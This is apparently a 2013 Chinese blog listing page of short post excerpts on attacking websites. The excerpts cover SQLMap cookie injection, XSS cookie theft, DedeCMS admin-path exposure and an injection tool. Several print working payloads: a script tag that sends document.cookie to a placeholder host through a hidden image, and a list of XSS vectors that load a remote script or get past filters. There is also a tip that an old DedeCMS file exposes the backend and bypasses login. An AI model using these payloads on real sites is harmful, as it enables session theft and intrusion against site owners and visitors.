利用SQLMap进行cookie注入

发表于2013 年 5 月 1 日admin

SQLMap 被称为注入神器,N多大神都使用SQLmap来进行注入测试, 继续阅读

发表在 dedecms参考 | 留下评论

WEB 服务器调试利器 — Tamper Data

发表于2013 年 5 月 1 日admin
一. 简介
      作为 Firefox 的插件, Tamper Data 简单易用,功能强大,可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数;可以用来跟踪 HTTP 请求和响应并记时;可以对 WEB 站点进行某些安全测试,从而为调试 WEB 配置带来了极大的便利,是网站维护人员不可多得的实用工具。 继续阅读
发表在 dedecms参考 | 留下评论

XSS获取cookie并利用(重要)

发表于2013 年 5 月 1 日admin

获取cookie利用代码cookie.asp 继续阅读

发表在 dedecms参考 | 留下评论

XSS偷cookie的代码

发表于2013 年 5 月 1 日admin

<script>document.write(‘<img src=”http://url/news.asp?msg=’+document.cookie+'” width=0 height=0 border=0 />’);</script>  继续阅读

发表在 dedecms参考 | 留下评论

人性化的盗cookie脚本

发表于2013 年 5 月 1 日admin

cookie窃取是最常见的跨站攻击之一,不管是用img,iframe方式,还是基于入库型或非入库的XSS,整个操作只需要带Cookie浏览器请求了某个的url即可完成。 继续阅读

发表在 dedecms参考 | 留下评论

服务器端口扫描工具

发表于2013 年 4 月 30 日admin

http://www.uzzf.com/key/duankou/

在线测端口

http://tool.chinaz.com/port/

发表在 dedecms参考 | 留下评论

dedecms爆后台文件技巧

发表于2013 年 4 月 30 日admin

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

发表在 dedecms参考 | 留下评论

XSS攻击汇总(转)

发表于2013 年 4 月 30 日admin 
相关链接:http://www.cnblogs.com/nicholas_f/archive/2012/10/20/2731880.html
(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javascript:alert(‘XSS’)>(4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:alert(‘XSS’)>(5)HTML编码(必须有分号)<IMG SRC=javascript:alert(“XSS”)>(6)修正缺陷IMG标签<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
(7)formCharCode标签(计算器)

继续阅读

发表在 dedecms参考 | 留下评论

常见的 XSS 注入攻击方式 Part.1

发表于2013 年 4 月 30 日admin

相关链接:http://www.gracecode.com/posts/2491.html

前端开发常见的安全问题就是会遭受 XSS 注入攻击 ,这里列举常见的代码注入方式。 继续阅读

发表在 dedecms参考 | 留下评论

视频: 穿山甲(Pangoin) 注入点挖掘器(Injection Digger)

发表于2013 年 4 月 30 日admin

http://player.youku.com/player.php/sid/XMzc2NTc1OTY0/v.swf

穿山甲(Pangolin)是一款帮助渗透测试人员

http://player.ku6.com/refer/HDxPgo0LXoIMooGcFOpJOA../v.swf

发表在 dedecms参考 | 留下评论